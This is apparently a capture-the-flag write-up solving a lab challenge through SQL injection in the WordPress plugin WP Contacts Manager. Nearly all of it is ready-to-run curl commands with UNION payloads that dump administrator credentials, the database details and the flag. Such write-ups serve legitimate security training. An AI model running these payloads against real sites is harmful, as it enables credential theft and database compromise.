
According to the hint, the WordPress plugin WP Contacts Manager <= 2.2.4 does not escape user input sufficiently, which leads to SQL injection.
The SQL injection point is the plugin's admin-ajax handler; request it at:
/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact

Information gathering turns up the exploit. The payload below pulls the administrator's user_login and user_pass from wp_users; note that the closing quote is sent as the JSON escape \u0027 and the UNION pads out to 12 columns (the URL must be quoted, otherwise the shell treats the & as a job separator):
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

Get the current database user and database name:
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user()),(SELECT database()),4,5,6,7,8,9,0,1,2; -- "}'

List all tables in the current database:
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  --data '{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6,7,8,9,0,1,2; -- "}'

Get the flag:
curl 'http://eci-2ze1t6k1q65z3s0hanxw.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
  --data '{"id":"1\u0027 UNION ALL SELECT 1,2,(SELECT group_concat(flag) from flag),4,5,6,7,8,9,0,1,2; -- "}'

Flag obtained: flag{367f9589-5515-4c04-8704-7613e2471d7e}